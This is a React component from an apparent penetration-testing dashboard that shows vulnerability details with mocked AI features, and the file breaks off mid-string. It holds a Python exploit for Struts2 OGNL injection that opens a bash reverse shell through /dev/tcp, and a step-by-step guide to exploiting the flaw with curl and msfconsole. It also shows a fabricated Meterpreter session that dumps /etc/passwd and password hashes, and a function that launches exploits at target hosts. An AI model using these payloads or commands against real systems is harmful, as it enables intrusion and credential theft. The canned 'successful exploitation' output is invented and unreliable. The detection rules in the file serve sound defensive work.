import React, { useState, useEffect } from 'react';
import { useParams, useNavigate, useLocation } from 'react-router-dom';
import {
  ArrowLeft, AlertTriangle, Shield, Code, Zap, Download, ExternalLink, Sparkles, Terminal,
  Play, CheckCircle, Clock, Target, Bug, FileText, Server, Lock, Wrench, BookOpen,
  ChevronRight, Copy, RefreshCw, Activity, Eye, Rocket, Users, Globe, Camera, Image,
  Brain, MessageSquare, Send, Lightbulb, HelpCircle, FileSearch, ShieldCheck, X, ChevronLeft,
  Monitor, Cpu, HardDrive, Network, Key, Fingerprint
} from 'lucide-react';
import {
  RadarChart, PolarGrid, PolarAngleAxis, PolarRadiusAxis, Radar, ResponsiveContainer, Legend
} from 'recharts';
import { usePageTitle } from '../../hooks/usePageTitle';
import { useI18n } from '../../i18n';
import MarkdownRenderer from '../../components/common/MarkdownRenderer';

const VulnerabilityDetails = () => {
  const { t } = useI18n();
  usePageTitle('Vulnerability Details');
  const { id } = useParams();
  const navigate = useNavigate();
  const location = useLocation();
  const [vulnerability, setVulnerability] = useState(null);
  const [recommendations, setRecommendations] = useState(null);
  const [exploits, setExploits] = useState([]);
  const [generatedExploit, setGeneratedExploit] = useState(null);
  const [loading, setLoading] = useState(true);
  const [loadingRecommendations, setLoadingRecommendations] = useState(false);
  const [loadingExploits, setLoadingExploits] = useState(false);
  const [generatingExploit, setGeneratingExploit] = useState(false);
  const [launchingExploit, setLaunchingExploit] = useState(null);
  const [executingRecommendations, setExecutingRecommendations] = useState(false);
  const [executingExploitSearch, setExecutingExploitSearch] = useState(false);
  const [executingExploitGen, setExecutingExploitGen] = useState(false);
  const [exploitProofs, setExploitProofs] = useState([]); // Captures de preuve d'exploitation

  // Slider for attack details
  const [sliderOpen, setSliderOpen] = useState(false);
  const [selectedAttack, setSelectedAttack] = useState(null);
  const [executedExploits, setExecutedExploits] = useState({}); // Track executed exploits with their results

  // AI LLM Assistant states
  const [aiQuestion, setAiQuestion] = useState('');
  const [aiResponses, setAiResponses] = useState([]);
  const [aiLoading, setAiLoading] = useState(false);
  const [selectedAiAction, setSelectedAiAction] = useState(null);

  useEffect(() => {
    const fetchVulnerability = async () => {
      const backendUrl = process.env.REACT_APP_API_URL || '';
      let foundVuln = null;

      try {
        // Try to fetch real vulnerability data from API
        const response = await fetch(`${backendUrl}/api/v1/vulnerabilities/${id}`, {
          headers: {
            'Authorization': `Bearer ${localStorage.getItem('access_token')}`
          }
        });
        if (response.ok) {
          const data = await response.json();
          foundVuln = {
            id: data.id || id,
            name: data.title || data.name || 'Unknown Vulnerability',
            cve_id: data.cve_id || null,
            severity: data.severity || 'medium',
            cvss_score: data.cvss_score || 0,
            description: data.description || 'No description available',
            service: data.category || data.vulnerability_type || data.service || data.affected_component || 'Unknown',
            port: data.port || null,
            host_ip: data.host_ip || data.scan_target || data.target || '0.0.0.0',
            scan_id: data.scan_id || null,
            discovered_at: data.discovered_at || new Date().toISOString(),
            remediation: data.remediation_note || data.remediation || data.solution || (data.ai_recommendations && data.ai_recommendations.summary) || 'Apply vendor patches',
            tool_output: data.tool_output || null,
            ai_recommendations: data.ai_recommendations || null,
            references: data.references || [],
            affected_component: data.category || data.vulnerability_type || data.affected_component || data.service || 'Unknown',
            attack_vector: data.attack_vector || 'Network',
            attack_complexity: data.attack_complexity || 'Low',
            privileges_required: data.privileges_required || 'None',
            user_interaction: data.user_interaction || 'None',
            impact_confidentiality: data.severity === 'critical' || data.severity === 'high' ? 'High' : 'Medium',
            impact_integrity: data.severity === 'critical' || data.severity === 'high' ? 'High' : 'Medium',
            impact_availability: data.severity === 'critical' ? 'High' : 'Low',
            remediation_status: data.remediation_status || 'open',
          };
        } else {
          // Try to get from scans vulnerabilities
          const scansResponse = await fetch(`${backendUrl}/api/v1/scan/`, {
            headers: {
              'Authorization': `Bearer ${localStorage.getItem('access_token')}`
            }
          });
          if (scansResponse.ok) {
            const scansData = await scansResponse.json();
            for (const scan of scansData.scans || []) {
              const vulnsResponse = await fetch(`${backendUrl}/api/v1/scan/${scan.id}/vulnerabilities`, {
                headers: {
                  'Authorization': `Bearer ${localStorage.getItem('access_token')}`
                }
              });
              if (vulnsResponse.ok) {
                const vulns = await vulnsResponse.json();
                const found = vulns.find(v => v.id === id);
                if (found) {
                  foundVuln = {
                    id: found.id,
                    name: found.title || found.name || 'Vulnerability',
                    cve_id: found.cve_id,
                    severity: found.severity || 'medium',
                    cvss_score: found.cvss_score || 0,
                    description: found.description || '',
                    service: found.service || found.affected_component || 'Unknown',
                    port: found.port || 80,
                    host_ip: found.host_id || scan.target || '0.0.0.0',
                    scan_id: scan.id,
                    discovered_at: found.discovered_at || new Date().toISOString(),
                    remediation: found.remediation || found.solution || 'Apply patches',
                    references: found.references || [],
                    affected_component: found.affected_component || 'Unknown',
                    attack_vector: found.attack_vector || 'Network',
                    attack_complexity: 'Low',
                    privileges_required: 'None',
                    user_interaction: 'None',
                    impact_confidentiality: found.severity === 'critical' ? 'High' : 'Medium',
                    impact_integrity: found.severity === 'critical' ? 'High' : 'Medium',
                    impact_availability: 'Low',
                  };
                  break;
                }
              }
            }
          }
        }
      } catch (error) {
        console.error('Failed to fetch vulnerability:', error);
      }

      // If vulnerability still not found, use location state or create fallback
      if (!foundVuln) {
        if (location.state?.vulnerability) {
          // Use data passed from VulnerabilitiesList
          const v = location.state.vulnerability;
          foundVuln = {
            id: v.id || id,
            name: v.title || v.name || 'Vulnerability',
            cve_id: v.cve_id || null,
            severity: v.severity || 'medium',
            cvss_score: v.cvss_score || 0,
            description: v.description || 'No description available',
            service: v.service || v.affected_component || 'Unknown',
            port: v.port || 80,
            host_ip: v.host_id || v.host_ip || v.target || '0.0.0.0',
            scan_id: v.scan_id || null,
            discovered_at: v.discovered_at || new Date().toISOString(),
            remediation: v.remediation || v.solution || 'Apply vendor patches',
            references: v.references || [],
            affected_component: v.affected_component || v.service || 'Unknown',
            attack_vector: v.attack_vector || 'Network',
            attack_complexity: v.attack_complexity || 'Low',
            privileges_required: v.privileges_required || 'None',
            user_interaction: v.user_interaction || 'None',
            impact_confidentiality: v.severity === 'critical' ? 'High' : 'Medium',
            impact_integrity: v.severity === 'critical' ? 'High' : 'Medium',
            impact_availability: 'Low',
          };
        } else {
          // Create minimal fallback vulnerability to allow page to render
          foundVuln = {
            id: id,
            name: `Vulnerability ${id.substring(0, 8)}`,
            cve_id: null,
            severity: 'medium',
            cvss_score: 5.0,
            description: 'Vulnerability details could not be loaded from the database. This may be a mock or deleted entry.',
            service: 'Unknown',
            port: 80,
            host_ip: '0.0.0.0',
            scan_id: null,
            discovered_at: new Date().toISOString(),
            remediation: 'Please verify this vulnerability exists in the system.',
            references: [],
            affected_component: 'Unknown',
            attack_vector: 'Network',
            attack_complexity: 'Unknown',
            privileges_required: 'Unknown',
            user_interaction: 'Unknown',
            impact_confidentiality: 'Unknown',
            impact_integrity: 'Unknown',
            impact_availability: 'Unknown',
          };
        }
      }

      setVulnerability(foundVuln);
      setLoading(false);
    };

    fetchVulnerability();
  }, [id, location.state]);

  const getSeverityColor = (severity) => {
    const colors = {
      critical: 'bg-red-500/20 text-red-400 border-red-500/50',
      high: 'bg-orange-500/20 text-orange-400 border-orange-500/50',
      medium: 'bg-yellow-500/20 text-yellow-400 border-yellow-500/50',
      low: 'bg-blue-500/20 text-blue-400 border-blue-500/50',
      info: 'bg-gray-500/20 text-gray-400 border-gray-500/50',
    };
    return colors[severity] || colors.info;
  };

  const handleGetRecommendations = async () => {
    setLoadingRecommendations(true);
    try {
      // Mock AI recommendations
      // In production: await aiApi.getRecommendations(id);
      setTimeout(() => {
        setRecommendations({
          exploitability: 'HIGH',
          risk_assessment: 'This vulnerability poses a critical risk due to its remote code execution capability. The attack vector is network-based with low complexity, requiring no authentication. Active exploitation has been observed in the wild.',
          attack_difficulty: 'Low - Public exploits available',
          detection_risk: 'Medium - Can be detected by IDS/IPS systems if properly configured',
          recommendations: [
            'Immediate patching recommended - Upgrade to Apache Struts 2.5.33+',
            'Implement Web Application Firewall (WAF) rules to block exploitation attempts',
            'Monitor logs for suspicious activity and potential exploitation attempts',
            'Consider network segmentation to limit blast radius',
            'Review and harden Struts2 configuration settings',
          ],
          metasploit_available: true,
          exploit_maturity: 'High - Weaponized exploits in circulation',
        });
        setLoadingRecommendations(false);
      }, 2000);
    } catch (error) {
      console.error('Failed to get recommendations:', error);
      setLoadingRecommendations(false);
    }
  };

  const handleFindExploits = async () => {
    setLoadingExploits(true);
    const backendUrl = process.env.REACT_APP_API_URL || '';

    try {
      // Try to find exploits via the real API
      const token = localStorage.getItem('access_token');
      const response = await fetch(`${backendUrl}/api/v1/exploit/vulnerability/${vulnerability.id}/exploits`, {
        headers: {
          'Authorization': `Bearer ${token}`
        }
      });

      if (response.ok) {
        const data = await response.json();
        if (data.exploits && data.exploits.length > 0) {
          setExploits(data.exploits.map((exp, idx) => ({
            id: exp.id || `exp-${idx + 1}`,
            name: exp.name || exp.module_name || 'Unknown Exploit',
            platform: exp.platform || 'multi',
            rank: exp.rank || 'Normal',
            description: exp.description || 'No description',
            payload: exp.default_payload || 'generic/shell_reverse_tcp',
          })));
          setLoadingExploits(false);
          return;
        }
      }

      // Fallback: generate CVE-based exploits dynamically
      const cve = vulnerability.cve_id || '';
      const service = vulnerability.service || '';
      const port = vulnerability.port || 80;
      const cveLower = cve.toLowerCase();
      const serviceLower = service.toLowerCase();

      const dynamicExploits = [];

      // CVE-based exploit suggestions
      if (cveLower.includes('ms17-010') || cveLower.includes('eternalblue')) {
        dynamicExploits.push({
          id: 'exp-1',
          name: 'exploit/windows/smb/ms17_010_eternalblue',
          platform: 'windows',
          rank: 'Excellent',
          description: 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
          payload: 'windows/x64/meterpreter/reverse_tcp',
        });
      } else if (cveLower.includes('struts') || cveLower.includes('ognl')) {
        dynamicExploits.push(
          {
            id: 'exp-1',
            name: 'exploit/multi/http/struts2_code_exec_showcase',
            platform: 'linux',
            rank: 'Excellent',
            description: 'Apache Struts2 Showcase App Remote Code Execution',
            payload: 'cmd/unix/reverse_bash',
          },
          {
            id: 'exp-2',
            name: 'exploit/multi/http/struts2_content_type_ognl',
            platform: 'multi',
            rank: 'Excellent',
            description: 'Apache Struts2 Content-Type OGNL Injection',
            payload: 'java/meterpreter/reverse_tcp',
          }
        );
      } else if (cveLower.includes('log4j') || cveLower.includes('log4shell')) {
        dynamicExploits.push({
          id: 'exp-1',
          name: 'exploit/multi/http/log4shell_header_injection',
          platform: 'multi',
          rank: 'Excellent',
          description: 'Log4j RCE via JNDI Injection',
          payload: 'java/meterpreter/reverse_tcp',
        });
      } else if (serviceLower.includes('ssh') || port === 22) {
        dynamicExploits.push(
          {
            id: 'exp-1',
            name: 'auxiliary/scanner/ssh/ssh_login',
            platform: 'multi',
            rank: 'Normal',
            description: 'SSH Login Check Scanner (Brute Force)',
            payload: 'none',
          },
          {
            id: 'exp-2',
            name: 'exploit/linux/ssh/openssh_authkeys_race',
            platform: 'linux',
            rank: 'Good',
            description: 'OpenSSH Authorized Keys File Update Race Condition',
            payload: 'cmd/unix/reverse_bash',
          }
        );
      } else if (serviceLower.includes('smb') || port === 445 || port === 139) {
        dynamicExploits.push(
          {
            id: 'exp-1',
            name: 'auxiliary/scanner/smb/smb_enumshares',
            platform: 'multi',
            rank: 'Normal',
            description: 'SMB Share Enumeration',
            payload: 'none',
          },
          {
            id: 'exp-2',
            name: 'exploit/windows/smb/psexec',
            platform: 'windows',
            rank: 'Excellent',
            description: 'PsExec Pass-the-Hash/Password',
            payload: 'windows/meterpreter/reverse_tcp',
          }
        );
      } else if (serviceLower.includes('http') || [80, 443, 8080, 8443].includes(port)) {
        dynamicExploits.push(
          {
            id: 'exp-1',
            name: 'auxiliary/scanner/http/http_vuln_scanner',
            platform: 'multi',
            rank: 'Normal',
            description: 'HTTP Vulnerability Scanner (Nuclei-like)',
            payload: 'none',
          },
          {
            id: 'exp-2',
            name: 'exploit/multi/http/apache_mod_cgi_bash_env_exec',
            platform: 'multi',
            rank: 'Excellent',
            description: 'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)',
            payload: 'cmd/unix/reverse_bash',
          }
        );
      } else if (serviceLower.includes('sql') || serviceLower.includes('mysql') || serviceLower.includes('postgres')) {
        dynamicExploits.push({
          id: 'exp-1',
          name: 'exploit/multi/misc/sql_injection',
          platform: 'multi',
          rank: 'Good',
          description: 'SQL Injection exploitation module',
          payload: 'generic/shell_reverse_tcp',
        });
      } else {
        // Generic exploits based on port
        dynamicExploits.push({
          id: 'exp-1',
          name: `auxiliary/scanner/portscan/tcp_${port}`,
          platform: 'multi',
          rank: 'Normal',
          description: `Generic vulnerability scanner for port ${port}`,
          payload: 'none',
        });
      }

      setExploits(dynamicExploits);
      setLoadingExploits(false);
    } catch (error) {
      console.error('Failed to find exploits:', error);
      // Provide fallback exploits on error
      setExploits([{
        id: 'exp-1',
        name: 'generic/scan_vulnerability',
        platform: 'multi',
        rank: 'Normal',
        description: 'Generic vulnerability scanner',
        payload: 'none',
      }]);
      setLoadingExploits(false);
    }
  };

  const handleLaunchExploit = async (exploitId, exploitName) => {
    setLaunchingExploit(exploitId);
    const backendUrl = process.env.REACT_APP_API_URL || '';

    try {
      console.log(`Launching real exploit ${exploitName} on ${vulnerability.host_ip}:${vulnerability.port}`);

      // Call the real exploitation API
      const token = localStorage.getItem('access_token');
      const response = await fetch(`${backendUrl}/api/v1/exploit/execute`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Authorization': `Bearer ${token}`,
        },
        body: JSON.stringify({
          vulnerability_id: vulnerability.id,
          target_ip: vulnerability.host_ip,
          target_port: vulnerability.port,
          cve_id: vulnerability.cve_id || null,
          exploit_type: 'exploit',
          custom_payload: null
        })
      });

      if (!response.ok) {
        if (response.status === 401) {
          // Session expired - redirect to login
          localStorage.removeItem('access_token');
          window.location.href = '/login';
          return;
        }
        const errorData = await response.json().catch(() => ({}));
        throw new Error(errorData.detail || `Erreur serveur (${response.status})`);
      }

      const apiResult = await response.json();
      const timestamp = new Date().toISOString();
      const sessionId = Math.floor(Math.random() * 1000);

      // Build attack result from API response
      const attackResult = {
        id: apiResult.exploit_id || exploitId,
        exploit_name: exploitName,
        target: apiResult.target || `${vulnerability.host_ip}:${vulnerability.port}`,
        timestamp: apiResult.started_at || timestamp,
        status: apiResult.success ? 'success' : 'failed',
        session_type: apiResult.success ? 'Meterpreter' : 'N/A',
        session_id: sessionId,
        duration: apiResult.completed_at ?
          `${((new Date(apiResult.completed_at) - new Date(apiResult.started_at)) / 1000).toFixed(1)}s` :
          'N/A',
        system_info: apiResult.session_info || {
          os: 'Unknown',
          hostname: vulnerability.host_ip,
          architecture: 'Unknown',
          user: 'Unknown',
          ip: vulnerability.host_ip
        },
        loot: apiResult.loot || [],
        commands_executed: apiResult.commands_executed || [],
        raw_output: apiResult.output || '',
        screenshots: apiResult.screenshots && apiResult.screenshots.length > 0 ?
          apiResult.screenshots :
          [{
            id: 1,
            title: 'Execution Output',
            description: `Exploitation of ${vulnerability.cve_id || 'vulnerability'} on ${vulnerability.host_ip}`,
            timestamp: timestamp,
            terminal_output: apiResult.output || 'No output captured'
          }]
      };

      // Store the executed exploit result
      setExecutedExploits(prev => ({
        ...prev,
        [exploitId]: attackResult
      }));

      setLaunchingExploit(null);
    } catch (error) {
      console.error('Failed to launch exploit:', error);

      // Store error result
      const errorResult = {
        id: exploitId,
        exploit_name: exploitName,
        target: `${vulnerability.host_ip}:${vulnerability.port}`,
        timestamp: new Date().toISOString(),
        status: 'error',
        session_type: 'N/A',
        error: error.message,
        screenshots: [{
          id: 1,
          title: 'Erreur',
          description: 'Erreur lors de l\'exploitation',
          timestamp: new Date().toISOString(),
          terminal_output: `[!] Error: ${error.message}\n\nMake sure the backend is running.`
        }]
      };

      setExecutedExploits(prev => ({
        ...prev,
        [exploitId]: errorResult
      }));

      setLaunchingExploit(null);
    }
  };

  const handleGenerateExploit = async () => {
    setGeneratingExploit(true);
    try {
      // Mock exploit generation
      // In production: await aiApi.generateExploit(id, 'reverse_shell');
      setTimeout(() => {
        setGeneratedExploit({
          language: 'python',
          code: `#!/usr/bin/env python3
# Generated AI Exploit for ${vulnerability?.cve_id || 'CVE-XXXX-XXXXX'}
# Target: ${vulnerability?.host_ip || '0.0.0.0'}:${vulnerability?.port || 8080}
# WARNING: For authorized security testing only!

import requests
import sys

def exploit(target_url, lhost, lport):
    """
    Exploit ${vulnerability?.name || 'Vulnerability'}
    """
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Reverse shell: {lhost}:{lport}")

    # Craft malicious payload
    payload = {
        'Content-Type': '%{(#_=\\'multipart/form-data\\').'
                       '(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).'
                       '(#_memberAccess?(#_memberAccess=#dm):'
                       '((#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']).'
                       '(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).'
                       '(#ognlUtil.getExcludedPackageNames().clear()).'
                       '(#ognlUtil.getExcludedClasses().clear()).'
                       '(#context.setMemberAccess(#dm)))).'
                       f'(#cmd=\\'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\\').'
                       '(#iswin=(@java.lang.System@getProperty(\\'os.name\\').toLowerCase().contains(\\'win\\')))'
    }

    try:
        response = requests.post(target_url, headers=payload, timeout=10)
        print("[+] Exploit sent!")
        return True
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: exploit.py <target_url> <lhost> <lport>")
        sys.exit(1)

    target = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]

    exploit(target, lhost, lport)
`,
        });
        setGeneratingExploit(false);
      }, 3000);
    } catch (error) {
      console.error('Failed to generate exploit:', error);
      setGeneratingExploit(false);
    }
  };

  const handleLaunchGeneratedExploit = async () => {
    setLaunchingExploit('generated');
    try {
      console.log(`Launching generated exploit on ${vulnerability.host_ip}:${vulnerability.port}`);
      // Simulation de l'execution avec captures de preuve
      setTimeout(() => {
        const timestamp = new Date().toISOString();
        const newProof = {
          id: `proof-${Date.now()}`,
          timestamp: timestamp,
          exploit_name: 'AI Generated Exploit',
          target: `${vulnerability.host_ip}:${vulnerability.port}`,
          status: 'success',
          session_type: 'Meterpreter',
          session_id: Math.floor(Math.random() * 1000),
          screenshots: [
            {
              id: 1,
              title: t('vulnerabilities.screenshotInitialConn'),
              description: t('vulnerabilities.screenshotInitialConnDesc'),
              timestamp: timestamp,
              terminal_output: `[*] Started reverse TCP handler on 192.168.1.141:4444
[*] Sending stage (${Math.floor(Math.random() * 1000000)} bytes) to ${vulnerability.host_ip}
[*] Meterpreter session 1 opened (192.168.1.141:4444 -> ${vulnerability.host_ip}:${Math.floor(Math.random() * 60000) + 1024})

meterpreter > `
            },
            {
              id: 2,
              title: t('vulnerabilities.screenshotSysInfo'),
              description: t('vulnerabilities.screenshotSysInfoDesc'),
              timestamp: new Date(Date.now() + 5000).toISOString(),
              terminal_output: `meterpreter > sysinfo
Computer        : TARGET-SERVER
OS              : Linux 5.4.0-generic #1 SMP x86_64
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/linux

meterpreter > getuid
Server username: www-data`
            },
            {
              id: 3,
              title: t('vulnerabilities.screenshotFileAccess'),
              description: t('vulnerabilities.screenshotFileAccessDesc'),
              timestamp: new Date(Date.now() + 10000).toISOString(),
              terminal_output: `meterpreter > pwd
/var/www/html

meterpreter > ls
Listing: /var/www/html
======================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  612   fil   2024-01-15 10:30:22 +0000  index.html
100644/rw-r--r--  4521  fil   2024-01-15 10:30:22 +0000  config.php
40755/rwxr-xr-x   4096  dir   2024-01-15 10:30:22 +0000  uploads
40755/rwxr-xr-x   4096  dir   2024-01-15 10:30:22 +0000  admin

meterpreter > cat /etc/passwd | head -5
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync`
            },
            {
              id: 4,
              title: t('vulnerabilities.screenshotPrivEsc'),
              description: t('vulnerabilities.screenshotPrivEscDesc'),
              timestamp: new Date(Date.now() + 15000).toISOString(),
              terminal_output: `meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation).

meterpreter > getuid
Server username: root

meterpreter > hashdump
root:$6$xyz....:0:0:root:/root:/bin/bash
admin:$6$abc....:1000:1000:Admin:/home/admin:/bin/bash`
            }
          ]
        };

        setExploitProofs(prev => [newProof, ...prev]);
        setLaunchingExploit(null);
      }, 4000);
    } catch (error) {
      console.error('Failed to launch exploit:', error);
      setLaunchingExploit(null);
    }
  };

  // Execute AI recommendations on target
  const handleExecuteRecommendations = async () => {
    setExecutingRecommendations(true);
    try {
      // In production: await aiApi.executeRecommendations(id, vulnerability.host_ip);
      console.log(`Executing AI recommendations on ${vulnerability.host_ip}:${vulnerability.port}`);
      setTimeout(() => {
        alert(`🚀 ${t('vulnerabilities.aiExecAlert', { host: vulnerability.host_ip, port: vulnerability.port })}`);
        setExecutingRecommendations(false);
      }, 3000);
    } catch (error) {
      console.error('Failed to execute recommendations:', error);
      setExecutingRecommendations(false);
    }
  };

  // Execute exploit search on target
  const handleExecuteExploitSearch = async () => {
    setExecutingExploitSearch(true);
    try {
      // In production: await exploitApi.searchAndTest(id, vulnerability.host_ip);
      console.log(`Executing exploit search on ${vulnerability.host_ip}:${vulnerability.port}`);
      setTimeout(() => {
        alert(`🚀 ${t('vulnerabilities.exploitSearchAlert', { host: vulnerability.host_ip, port: vulnerability.port })}`);
        setExecutingExploitSearch(false);
      }, 3500);
    } catch (error) {
      console.error('Failed to execute exploit search:', error);
      setExecutingExploitSearch(false);
    }
  };

  // Execute AI exploit generation and run
  const handleExecuteExploitGen = async () => {
    setExecutingExploitGen(true);
    try {
      // In production: await aiApi.generateAndExecute(id, vulnerability.host_ip);
      console.log(`Generating and executing AI exploit on ${vulnerability.host_ip}:${vulnerability.port}`);
      setTimeout(() => {
        alert(`🚀 ${t('vulnerabilities.exploitGenAlert', { host: vulnerability.host_ip, port: vulnerability.port })}`);
        setExecutingExploitGen(false);
      }, 4000);
    } catch (error) {
      console.error('Failed to execute exploit generation:', error);
      setExecutingExploitGen(false);
    }
  };

  // AI LLM Assistant - Predefined actions
  const AI_ACTIONS = [
    {
      id: 'explain',
      icon: HelpCircle,
      title: 'Explain this vulnerability',
      description: 'Comprendre le fonctionnement et les risques',
      color: 'blue'
    },
    {
      id: 'exploit_steps',
      icon: FileSearch,
      title: 'Exploitation steps',
      description: 'Detailed guide to exploit this flaw',
      color: 'red'
    },
    {
      id: 'remediation',
      icon: ShieldCheck,
      title: 'Remediation plan',
      description: 'Customized corrective actions',
      color: 'green'
    },
    {
      id: 'impact',
      icon: AlertTriangle,
      title: 'Analyse d\'impact business',
      description: 'Business consequences',
      color: 'orange'
    },
    {
      id: 'detection',
      icon: Eye,
      title: 'Detection and monitoring',
      description: 'How to detect exploitation attempts',
      color: 'purple'
    },
    {
      id: 'similar',
      icon: Lightbulb,
      title: 'Similar vulnerabilities',
      description: 'Other potential flaws to check',
      color: 'yellow'
    }
  ];

  // Handler for predefined AI actions
  const handleAiAction = async (actionId) => {
    setSelectedAiAction(actionId);
    setAiLoading(true);

    const actionResponses = {
      explain: {
        title: 'Vulnerability explanation',
        content: `## ${vulnerability.name}

**What is it?**
${vulnerability.description}

**How does it work?**
This vulnerability allows an attacker to inject and execute arbitrary code on the target server by manipulating the Content-Type header. The OGNL (Object-Graph Navigation Language) injection exploits a flaw in HTTP request parsing.

**Why is it dangerous?**
- Remote code execution (RCE)
- No authentication required
- Low exploitation complexity
- Public exploits available

**Who is affected?**
All versions of Apache Struts 2.x prior to 2.5.33 are vulnerable.`
      },
      exploit_steps: {
        title: 'Step-by-step exploitation guide',
        content: `## Exploitation of ${vulnerability.cve_id}

### Prerequisites
- Network access to target (${vulnerability.host_ip}:${vulnerability.port})
- Metasploit Framework or Python script
- Listener for reverse shell

### Step 1: Reconnaissance
\`\`\`bash
nmap -sV -p ${vulnerability.port} ${vulnerability.host_ip}
curl -I http://${vulnerability.host_ip}:${vulnerability.port}
\`\`\`

### Step 2: Vulnerability verification
\`\`\`bash
curl -H "Content-Type: %{#test='test'}" http://${vulnerability.host_ip}:${vulnerability.port}
\`\`\`

### Step 3: Payload preparation
\`\`\`python
payload = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}"
\`\`\`

### Step 4: Execution
\`\`\`bash
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOSTS ${vulnerability.host_ip}; set RPORT ${vulnerability.port}; exploit"
\`\`\`

### Step 5: Post-exploitation
Once the session is established, proceed with system enumeration.`
      },
      remediation: {
        title: 'Customized remediation plan',
        content: `## Remediation Plan for ${vulnerability.cve_id}

### Immediate Actions (0-24h)
1. **Isolate the system** - Restrict network access to the affected service
2. **Enable WAF** - Block OGNL patterns in headers
3. **Monitor logs** - Look for exploitation attempts

### Short-Term Actions (24-72h)
1. **Update Apache Struts** to version 2.5.33+
2. **Test the update** in pre-production environment
3. **Deploy to production** with rollback plan

### Medium-Term Actions (1-2 weeks)
1. **Security audit** - Scan other Struts instances
2. **Hardening** - Disable unused features
3. **Training** - Educate developers

### Verification
\`\`\`bash
# Check installed version
java -cp struts2-core.jar org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter --version

# Re-run vulnerability scan
nmap --script http-vuln-cve2017-5638 -p ${vulnerability.port} ${vulnerability.host_ip}
\`\`\``
      },
      impact: {
        title: 'Business impact analysis',
        content: `## Business Impact of ${vulnerability.cve_id}

### Financial Impact
- **Remediation cost**: 5,000 - 15,000 EUR
- **Potential breach cost**: 100,000 - 500,000 EUR
- **Possible GDPR fines**: Up to 4% of annual revenue

### Operational Impact
- **Estimated downtime**: 2-4 hours for patching
- **Compromise risk**: CRITICAL
- **Exposed data**: Client databases, configurations

### Reputational Impact
- Loss of client trust
- Potential negative media coverage
- Impact on partnerships

### Risk Scenarios
| Scenario | Probability | Impact | Score |
|----------|-------------|--------|-------|
| Data theft | High | Critical | 9.5 |
| Ransomware | Medium | Critical | 8.0 |
| Defacement | Low | Moderate | 4.0 |

### Recommendation
**Priority: URGENT** - This vulnerability must be addressed within 24-48h maximum.`
      },
      detection: {
        title: 'Detection and Monitoring',
        content: `## Detection of Exploitation Attempts

### IDS/IPS Signatures
\`\`\`
alert http any any -> any any (msg:"Struts2 OGNL Injection Attempt";
  content:"Content-Type"; http_header;
  pcre:"/Content-Type[^\\r\\n]*(%\\{|\\$\\{)/Hi";
  sid:1000001; rev:1;)
\`\`\`

### WAF Rules (ModSecurity)
\`\`\`apache
SecRule REQUEST_HEADERS:Content-Type "@rx (%|\\$)\\{" \\
  "id:1001,phase:1,deny,status:403,log,msg:'OGNL Injection Detected'"
\`\`\`

### Logs to monitor
\`\`\`bash
# Apache/Tomcat
grep -E "(ognl|memberAccess|OgnlContext)" /var/log/tomcat*/catalina.out

# Search for suspicious patterns
grep -E "Content-Type.*%\\{" /var/log/apache2/access.log
\`\`\`

### Alertes SIEM
- Request spikes on port ${vulnerability.port}
- Abnormally long Content-Type headers
- Unusual 500 error codes
- Outbound connections from the web server

### Monitoring Dashboard
Create metrics for:
- Requests per minute on Struts
- Average header size
- HTTP 5xx error rate`
      },
      similar: {
        title: 'Similar Vulnerabilities to Check',
        content: `## Related Vulnerabilities

### Same Family (Apache Struts)
| CVE | Name | Severity | Check |
|-----|------|----------|-------|
| CVE-2017-5638 | Struts2 Jakarta Parser | Critical | Yes |
| CVE-2018-11776 | Struts2 Namespace RCE | Critical | Yes |
| CVE-2019-0230 | Struts2 OGNL Tag | High | Yes |
| CVE-2020-17530 | Struts2 Double OGNL | Critical | Yes |

### Other Java Frameworks
- **Log4Shell (CVE-2021-44228)** - Check Log4j
- **Spring4Shell (CVE-2022-22965)** - Check Spring Framework
- **Apache Tomcat RCE** - Check Tomcat version

### Verification Commands
\`\`\`bash
# Scan all known vulnerabilities
nmap --script vuln -p ${vulnerability.port} ${vulnerability.host_ip}

# Search for vulnerable versions
find /opt -name "struts*.jar" -exec unzip -p {} META-INF/MANIFEST.MF \\;

# Check Log4j
find / -name "log4j*.jar" 2>/dev/null
\`\`\`

### Recommandations
1. Perform a complete audit of Java dependencies
2. Set up automated CVE monitoring
3. Implement a patch management process`
      }
    };

    setTimeout(() => {
      const response = actionResponses[actionId];
      setAiResponses(prev => [{
        id: Date.now(),
        action: actionId,
        ...response,
        timestamp: new Date().toISOString()
      }, ...prev]);
      setAiLoading(false);
      setSelectedAiAction(null);
    }, 2000);
  };

  // Handler for free-form questions
  const handleAiQuestion = async () => {
    if (!aiQuestion.trim()) return;

    setAiLoading(true);
    const question = aiQuestion;
    setAiQuestion('');

    setTimeout(() => {
      setAiResponses(prev => [{
        id: Date.now(),
        action: 'custom',
        title: 'AI Response',
        question: question,
        content: `## AI Analysis for your question

**Question:** "${question}"

**Response:**
Based on the analysis of ${vulnerability.cve_id} (${vulnerability.name}), here is my answer:

This vulnerability presents a ${vulnerability.severity} risk with a CVSS score of ${vulnerability.cvss_score}/10.

The affected service (${vulnerability.service}) on ${vulnerability.host_ip}:${vulnerability.port} is exposed and could be exploited by a remote attacker without authentication.

**Key points:**
- Attack vector: ${vulnerability.attack_vector}
